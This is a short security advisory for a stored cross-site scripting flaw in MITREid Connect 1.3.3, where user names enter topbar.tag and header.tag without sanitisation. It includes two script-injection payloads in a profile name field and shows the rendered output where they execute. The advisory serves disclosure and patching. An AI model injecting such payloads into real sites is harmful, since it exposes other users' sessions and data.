MITREid 1.3.3 Cross Site Scripting

                							

                MITREid Connect OpenID-Connect-Java-Spring-Server
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is
included in *topbar.tag* and *header.tag* without being sanitized.  A user
can set their name to a value like:

Test</script><script>alert(1)</script>

Which will be included in JSON used by a JavaScript function in *header.tag*
:

// get the info of the current user, if available (null otherwise)
>     function getUserInfo() {
>         return {"sub":"12318767","name":"
> *Test</script><script>alert(1)</script>*
> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"
> test@test.com","email_verified":true};}


A name such as:

Test<script>alert(1)</script>

would also work; it is included in the page when menus are created by
*topbar.tag*:

<!-- use a simplified user button system when collapsed -->
> <ul class="nav hidden-desktop">
> <li><a href="manage/#user/profile">*Test<script>alert(1)</script>*
> Test</a></li>
> <li class="divider"></li>
> <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log
> out</a></li>


This issue has been reported on Github
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521>
with
patches pending.

A write up is available at:
https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497


<p>